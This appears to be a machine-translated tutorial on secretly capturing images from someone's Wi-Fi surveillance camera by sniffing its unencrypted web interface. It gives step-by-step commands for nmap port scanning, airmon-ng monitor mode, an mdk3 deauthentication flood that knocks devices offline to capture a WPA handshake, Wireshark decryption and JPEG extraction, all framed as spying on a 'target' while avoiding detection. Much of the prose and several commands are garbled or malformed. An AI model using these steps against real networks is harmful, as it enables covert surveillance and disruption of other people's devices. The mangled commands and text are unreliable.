It is common for IoT devices, such as Wi-Fi surveillance cameras, to host a Web site to control or configure the camera that uses HTTP instead of secure HTTPS. This means that anyone with a network password can see traffic to and from the camera so that a hacker can intercept surveillance material from the surveillance camera when someone is looking at the camera's HTTP display page.
IoT Devices and Administration Pages
A Thing on the Internet The things that devices usually have in common are a lack of focus on security. Convenience is often more important, so details such as securing the management page for a device may be retroactive to some developers. Therefore, it is common for these devices to be displayed on Nmap searches with open unsafe ports. Worse, some of these devices are designed to connect directly to the Internet, not just the internal network.
For security cameras, this problem is exacerbated if the camera also hosts an insecure webpage where the owner can watch videos directly from the camera. If so, anyone who knows the Wi-Fi password can see exactly what the target sees on the surveillance camera. Since most companies or private houses with a camera have a monitor set up to display the camera, this can be a serious problem for users with weak passwords or other users sharing the network.
Ports 80 and 81
When scanning devices With Wireshark, there are some ports that appear open on devices such as routers, security cameras, and other Wi-Fi enabled IoT devices. If you see a port 80, 81, 8080, or 8081, it most likely means that this port is hosting an insecure HTTP Web site. While you need to know the password of a Wi-Fi network to search for these ports, you can access them over the Wi-Fi network to check the web application they host.
While port 443 is used for secure HTTPS traffic, this is the case is encrypted and does not represent the same interception risk. Any port that releases an insecure HTTP port over the local network is an invitation to an attacker to inquire for more information about the connected device. This may mean attempting to log in, gathering information about the firmware that is running the device, or attacking it with a program such as RouterSploit to attempt a break-in.
At a lesser known risk, someone has to intercept passwords and other information when they pass through the unsafe web application. When a destination has logged in and is viewing images from the surveillance camera live from an insecure web app, it is relatively easy to intercept the web traffic and decode the intercepted packets into image files.
Intercepting traffic with Wireshark
To make In this work, we need to use Wireshark to monitor the Wi-Fi traffic between our target computer and the router. Our goal is to capture unencrypted HTTP traffic flowing on the target's computer while watching the surveillance camera feed. But to do that, there are a few things we need to be aware of first.
We need to unlock the network. If we know the password, we can always connect ourselves to the network, but this carries another detection risk. Instead, we can add the Wi-Fi keys we know to Wireshark and decrypt the data we collect without ever connecting to the network. This means that our attack will be mostly passive, leaving us little opportunity for discovery.
One crucial thing we do not need passively is a Wi-Fi handshake to see the traffic. Since Wireshark must follow a Wi-Fi handshake to decrypt the subsequent traffic, it is not enough to know the password. To be successful, we need to isolate the traffic from the computer we're interested in with a wireshark filter, capture a four-way WPA handshake, and then decrypt the data with the password we know.
The conditions must be favorable for this attack to succeed. If the camera does not use an insecure interface, the data is encrypted and we can not see it.
If no one watches the camera's condition or is not displayed on a monitor, it will not intercept any unsafe traffic, so we will not see anything. If we do not know the network password, we can not catch the encrypted traffic. If we can not temporarily drop a client off the network to generate a four-way handshake, then it does not help if we know the password. And finally, when we are out of the network's reach, we can not catch traffic that we can not hear.
While this may seem like a variety of requirements, it's common practice to be able to do this. If the target has a Wi-Fi surveillance camera and a monitor images the display, all you should do is Use Wi-Fi password, except for a Kali Linux-compatible wireless network adapter.
Once you & # 39; If you're within range and have loaded Kali Linux, you should be ready. Plug in your wireless network adapter and make sure Wireshark is installed. If you do not have Wireshark, you can download the installer from the website.
Recommended Network Adapter: Alfa AWUS036NHA Long-range Wireless B / G / N-USB Adapter
Step 1: Access the Web Camera via the Insecure Interface
To start You access the built-in interface of any webcam or Wi-Fi surveillance camera you want to intercept. In a browser window on your "target computer", navigate to the HTTP interface, enter the required password, and begin viewing the live webcam view.
If you need to locate your camera on the network, you can run a Nmap Scan to discover different devices on the network running insecure HTTP ports.
You need to know the network area for this command. You can do this by typing ifconfig and copying down the IP address assigned to your computer. Then you can enter ipcalc and your IP address to calculate the network range. It should be something like 192.168.0.0/24. Run the following command and replace your own network realm with 192.168.0.0/24.
sudo nmap -p 80,81.8080.8081 192.168.0.0/24[19659025()Searchfordeviceswiththisport"open"andifyoucannavigatetoityoucanentertheIPaddressandthen: 81 to access port 81 on this IP address. If you want to navigate to port 8081 in 192.168.0.1, enter 192.168.0.1:8081 in your browser window.
Step 2: Identify the Channel and Prepare the WLAN Card
You will be required to connect your Wi-Fi network adapter, such as a Wi-Fi network adapter. B. the Alfa AWUS036NHA. You need to do two things before starting Wireshark: the first one is to put the card in wireless monitor mode, and the second one to identify the channel the router is targeted for broadcasting ,
To put your card in wireless mode In Monitor mode, monitor the name of your card by running ifconfig in a terminal window. The name should be about wlan0 . hot
. If you have found the name of your WLAN card, you must activate the monitoring mode. Run the following command in a terminal window, where the name of your card is "wlan0."
airmon-ng start wlan0 is replaced airodump-ng start wlan0mon
This places your card in wireless monitoring mode and changes the name of the card to add "mon" at the end. It also starts Airodump-ng, which searches for nearby wireless networks.
Find the Wi-Fi network that you want to spy on and make a note of the channel that is currently active. We need to change our map to this channel to intercept the images in Wireshark.
CH 4] [ Elapsed: 0 s ] [2018-12-24 02:42 BSSID PWR beacons #data, # / s CH MB ENC CIPHER AUTH ESSID C0: 8A: DE: 39: CD: D9 -46 2 0 0 1 130 WPA2 CCMP MGT TWCWiFi Passpoint C0: 8A: DE: F9: CD: D8 -47 2 0 0 1 130 OPN TWCWiFi C0: 8A: DE: B9: CD: D8 -46 2 0 0 1 130 OPN SpectrumWiFi C0: 8A: DE: 39: CD: D8 -47 2 0 0 1 130 OPN CableWiFi 78: 96: 84: 00: B5: B0 -42 2 0 0 1 130 WPA2 CCMP PSK The Daily Planet 00: 9C: 02: D2: 5E: B9 -60 3 0 0 1 54e. WPA2 CCMP PSK HP-Print-B9-Officejet Pro 8600 20: 10: 7A: 92: 76: 43 - 51 2 0 0 1 130 WPA2 CCMP PSK SBG6580E8 DE: Q2: 86: EC: CA: A0 -45 1 0 0 11 195 WPA2 CCMP PSK Bourgeois Pig Guest D6: 04: CD: BD: 33: A1 -55 1 0 0 11 130 WPA2 CCMP PSK DirtyLittleBirdyFeet BSSID STATION PWR Rate Lost Frames Sample root @ kali: ~ / Desktop #
If our target is on channel 11, we execute the following command to place our card on channel 11.
airmon-ng start wlan0mon 11
Step 3: Start Wireshark
Now that our wireless network adapter is listening on the same channel as the traffic we want to intercept, it's time to start Wireshark. When Wireshark opens, double-click the card that put you in monitor mode to start recording.
Our map should now scan on the correct channel, but without a network password, we can not see anything. To solve this, we need to provide Wireshark with some encryption keys.
To add encryption keys to Wireshark, click Edit on the menu, then Settings to display the Settings menu. Then select "Logs" in the sidebar to see a list of protocols that can be translated by Wireshark.
When you are in the Protocols drop-down menu just opened, you want to select "IEEE 802.11" to display options for decrypting Wi-Fi. Make sure that the "Enable Decryption" checkbox is checked, and click the "Edit" button next to "Decryption Keys" to open the list of keys that will be used by Wireshark to decrypt the traffic.
If the WEP and WPA decryption key menu is open, click the box on the left and select "wpa-psw" to add. While we can add a "wpa-psk" here as well, we would have to calculate it ourselves, which is more complicated than simply entering the password.
For decryption To work, you must add the key by clicking the plus sign (+), and then enter the key in the format : networkname to add it to the list.
Click "OK" to save the key, and now we should be able to decrypt the traffic from that network - if we look at a four-sided Wi-Fi Handshake can gain.
We will certainly see a lot of traffic in our Wireshark capture. Although we can not decrypt it yet because we do not have a handshake, we can create a filter to make sure that only traffic to the device we spy is displayed.
The best way to do this on a device The Wi-Fi network looks for some of the traffic on the computer we're looking for, and then creates a display filter to show only packets that go to that MAC Address to be directed. This means that any traffic directed to the destination computer will be displayed and any other network traffic will be ignored.
Under the package information, right-click the "recipient address" to send a package to the target device. Select "Apply as filter" and then "Selected". Now only packages to the destination should be displayed.
Now that we have the traffic from our separate target device, we need to generate a four-way handshake, by temporarily dropping the target computer out of the network while Wireshark listens. For this purpose, we can use a tool from an earlier manual called MDK3, which can be used to kill all devices connected to Wi-Fi and generate a handshake.
Since we already know the channel, our Wi-Fi is already known. If the network is turned on, you can use MDK3 to remove all devices running on that channel. It should not take you long to generate an WPA handshake. If "wlan0mon" has been replaced with the name of your wireless card and "11" is being exchanged for the channel you are attacking, run the following command in a terminal window to block the network.
mdk3 wlan0mon d -c 11
After a few moments, nearby devices on the network should reconnect automatically, so you can cancel the WPA four-way handshake. If you want to make sure you have the appropriate terminal, you can open a new terminal window and run Airodump-ng to see when you receive a WPA handshake.
Enter airodump-ng wlan0mon 11 . (Instead, replace "wlan0mon" and "11") to watch for WPA handshakes while you are running MDK3.
Once you see the result above, you have captured a picture WPA-4-way handshake! Make sure that the MAC address matches the targeted Wi-Fi network to avoid a handshake for the wrong network.
Now we have a four-way handshake and have entered the network key We should have full access to data transmitted over the network. While HTTPS is still off the table, we should be able to see pure HTTP.
Step 7: Filter traffic for HTTP traffic
While we may have access to network traffic and have been limited to the destination computer, other traffic may be coming in. It is not interconnected and makes it difficult to get up to focus on what we are looking for. To go through this, we'll add another network filter to show only the HTTP traffic that flows on the network.
In the Wireshark main view, enter http in the display filter bar.
This only allows the display of HTTP traffic to the computer we are monitoring and further filtering our viewpoint until we only look at the traffic of our insecure web app , Now we actually have to decode the intercepted packets into pictures so we can see what our target looks like from the surveillance camera.
Now that we can see the HTTP traffic from the web app. We need to pick the encoded JPEG files to make something we can work with. Stop recording and click on "File" and then on "Export objects". We will export the found HTTP objects, so click on "HTTP" to open the object list.
In the HTTP object list, we will display a list of HTTP objects we intercepted. Here we can see the JPEG images we want to decode. You can select one or all and then click "Save" or "Save All" and select a location to which you want to export the files.
Click Close. "and navigate to the folder where you exported the images, you should see a list of the files that Wireshark exported from our image, depending more or less on how long you took the image. [19659073CapturingImagesfromaWiresharkSurveillanceCamera" width="532" height="532" style="max-width:532px;height:auto;"/>